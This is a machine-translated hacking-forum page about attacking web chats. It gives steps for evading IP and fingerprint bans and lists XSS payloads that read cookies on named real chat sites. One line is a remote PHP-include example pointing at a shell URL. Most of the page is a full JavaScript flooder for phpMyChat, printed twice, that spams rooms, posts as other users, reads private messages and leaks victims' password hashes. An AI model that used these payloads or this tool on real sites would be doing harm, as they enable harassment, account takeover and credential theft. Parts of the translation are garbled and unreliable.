This page has been robot translated, sorry for typos if any. Original content here.

Chats, Sicherheitslücken. Codes Hochwasser

Bypass verbieten

In vielen Chats kann der Administrator Sie auf verschiedene Arten sperren:
-von Spitznamen -von Seife -von IP-Adresse -von Comp_ID Die ersten beiden Punkte kosten eine Änderung von Spitzname und Seife.


Bypass nach IP-Adresse verbieten.

1) Melden Sie sich vom Chat ab. 2) Löschen Sie Cookies für diesen Chat. Schließen Sie das Browserfenster. 3) Ändern Sie die IP mit einem Proxy. 1. Ich denke, jeder wird mit dem ersten Punkt fertig werden ... 2. Klicken Sie im Browser (Internet Explorer) auf Extras -> Internetoptionen -> "Cookies" löschen. 3. Verwenden Sie für Proxys A4Proxy, Hide.IP.Platinum.v2.1 (suchen Sie nach neueren Versionen) und es gibt auch ein Programm, das die Browser-ID mit "Super Ban" (nur in FastBB-Foren) "AntiBan" ändert.


Bypass durch Comp_ID verbieten.

Nehmen Sie zum Beispiel Comp_ID: yjQVj1KUZbd45, es besteht aus 13 Zeichen (dies ist immer der Fall). 1,2,3,4 Zeichen - dies wird vom Skript beim Aufrufen der Seite der Website, des Chats, des Forums übertragen, und diese Zeichen ändern sich. Bei diesem Programm sind 9,10 Zeichen der Benutzeragent! Es ändert sich durch Wechseln zu einem anderen Browser oder durch Ändern der Registrierung: Gehen Sie zur Registrierung (start-> execute-> regedit) und suchen Sie dort nach diesem Abschnitt: HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Interneteinstellungen \ User Agent \ Post Platform Erstellen Sie hier Abschnitt, ein Zeichenfolgenparameter mit dem Namen "Ultra-Pooper Post Platform" und einem Wert, z. B. "IEAK". und gehe zum Browser! Sie können diese Zeichen auch mit diesem Programm ändern. RMOSChange 11 und 5,6,7,8 Zeichen - Zeitzone. Ändern Sie die Zeitzone und alles ist in Ordnung. 12. Farbtiefe. Ändern Sie die Farbtiefe in den Bildschirmeinstellungen. 13. Bildschirmauflösung. Ändern Sie die Bildschirmauflösung.


Sicherheitslücken einiger Chats

  ------------------------- Vodoo CHAT ----------------------- ----
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Autor: qBiN
 Exploit:
 http://site.com/chat/go.php?url=java script: alert (/ Getestet% 20by% 20qBiN /);
 Lösung: Filtern Sie die URL-Variable. Sie können sie sogar mithilfe von Sockets auf Gültigkeit überprüfen.
 ------------------------------
 Typ: [XSS]
 Produkt: Voodoo-Chat
 Autor: qBiN
 Exploit:
 http: //sitename/chat/password_reminder.php? look_for =% 3Cscript% 3Ealert (/ qBiN test /);% 3C / script% 3E
 ------------------------------
 Typ: [PHP einschließlich]
 Produkt: Voodoo Chat 1.0RC1b und möglicherweise frühere Versionen.
 Quelle: xakep.ru
 Ein Beispiel:
 http://sitename.com/[ScriptPath.BIZ/index.php?file_path=http://SHELLURL.COM?
 ------------------------------
 Typ: FLUTER
 Produkt: Voodoo-Chat
 Autor: NaX [no] r †
 ausnutzen: 
 http://www.balartrating.ru/flood.zip
 ------------------------- CHAT BORODIN ----------------------- ----
 Vielleicht ist das Material etwas alt, aber immer noch http://antichat.ru/txt/chat_borodin/ Das Video ist hier http://video.antichat.net/videos/chat_borodin.rar Sicherheitslücke gefunden: Morph
 Artikel Autor: Morph
 ------------------------- NAROD Chat ----------------------- ----
 Typ: [XSS]
 Produkt: NAROD Chat
 Autor: [sL1p]
 Exploit: Passives XSS:
 http://www.yandex.ru/cgi-bin/customize.pl?yxqs= "> <script> alert (document.cookie) </ script>
 ------------------------- Sicherheitslücken bei bestimmten Chats ---------------------- -----
 Typ: [XSS]
 Produkt: www.bazar.co.ua
 Autor: max_pain89
 Exploit: Passives XSS:
 http://www.bazar.co.ua/?error[†= <script> bestätigen (/ xxx /) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.sibchat.ru
 Autor: [sL1p], Kaban
 Exploit: Passives XSS:
 http://www.sibchat.ru/gallery.php?sid= '> <script> alert (document.cookie) </ script> http://www.sibchat.ru/card_help.php?sid= "> < script> alert (document.cookie) </ script> http://www.sibchat.ru/register.php?sid= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chatinez.zp.ua
 Autor: [sL1p]
 Exploit: Passives XSS:
 http://chatinet.zp.ua/winter2005/party/?001=6941337 <a>% 22% 27 "> <script> alert (document.cookie) </ script>
 Falls gewünscht, kann 001 ersetzt werden durch:
 002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016
 ------------------------------
 Typ: [XSS]
 Produkt: www.smchat.ru
 Autor: [sL1p]
 Exploit: Passives XSS:
 http://www.smchat.ru/?key= "> <script> alert (document.cookie) </ script>
 http://www.smchat.ru/?chatname=&key= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?ontopic=default&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?activate=&login= "> <script> alert (document.cookie) </ script>
 http://www.smchat.ru/?password1=&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?det=default&login= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?count=1000&key= "> <script> alert (document.cookie) </ script> 
 http://www.smchat.ru/?email=&key= "> <script> alert (document.cookie) </ script>
 ------------------------------
 Typ: [XSS]
 Produkt: www.chat.ru.
 Autor: [sL1p]
 Exploit: Passives XSS:
 http://www.chat.ru/user/register.html?dop10=default&confemail= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?anotherpw= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?city=&name= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?action=default&username= "> <script> alert (document.cookie) </ script> 
 http://www.chat.ru/user/register.html?city=&year= "> <script> alert (document.cookie) </ script>
 Durch das Kombinieren von Abfragen können Sie viel mehr xss als in dieser Liste implementieren. 
------------------------------ Typ: [XSS] Produkt: www.krovatka.ru Autor: [sL1p], blackybr Exploit: Passives XSS: http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8 "> <script> alert (document.cookie) </ script> http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="> <script>alert(document.cookie)%3B </ script> http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="> <script>alert(document.cookie)%3B </ script> http://klubnichka.krovatka.ru/sms/xp.cgi?mn="> <script>alert(document.cookie)%3B</script>&ch=6&flag=0 http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script % 3E Wenn beispielsweise der klubnichka-Kanal verwendet wird und der Name des Kanals geändert wird, können Sie xss natürlich überall implementieren. ------------------------------ Typ: [XSS] Produkt: www.chatcity.ru Autor: [sL1p] Code: http://www.ChatID.chatcity.ru/people/pp33.cgi?c=Chat ID & nn = "> <script> alert (document.cookie) </ script> Die Chat-ID wird durch die Chat-Adresse ersetzt. Sie sind alle von digitaler Bedeutung. ------------------------------


Javascript Flooding für Phpmychat

Wie man benutzt:

Chat-Adresse in <BASE href = "/click?http://neuch.ru/chat/">

(Sie müssen den Pfad zum Chat-Ordner angeben, manchmal chat \ chat \)

Schaltfläche "Flut stoppen", um jede Art von Flut zu stoppen

Eingaben von verschiedenen Spitznamenfluten wie folgt:

"user0 betritt den Raum"
"Benutzer1 betritt den Raum"
"Benutzer2 betritt den Raum"

Login und Flood von verschiedenen Spitznamen:
Das gleiche, nur jeder eingeloggte hinterlässt einen Brei

Login:
Betreten Sie einfach den Chat, damit Sie von einem Benutzer überfluten können
Was ist niedriger als die Überschrift Senden von Nachrichten - zum Fluten von einem Benutzer

Von allen Benutzern im IE:
Sie können im Namen aller anderen Personen schreiben, die sich im Internet Explorer befinden
Andere nützliche Funktionen
Pass ändern
Hash vom Sniffer und Login, um das Profil zu betreten, ändern Sie einfach seinen Pass schneller
(nicht mehr relevant, da der Hash überhaupt nicht benötigt wird, um den Benutzer zu ficken)

Ausländische Privat:
Betreff lesen
Senden von Skripten für Mazil
Für den Mozilla-Browser ist es nur so, dass sie nicht \ x3c \ x3e rollen, da ist es etwas Besonderes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+ii=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\"> \n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\"> \n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> <INPUT TYPE="submit" value="Вход"> <td align=center> <INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> <INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> <form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> <form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> <FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> <INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> <font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> <input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea> <tr> <th> <INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML In * .htm speichern und verwenden 


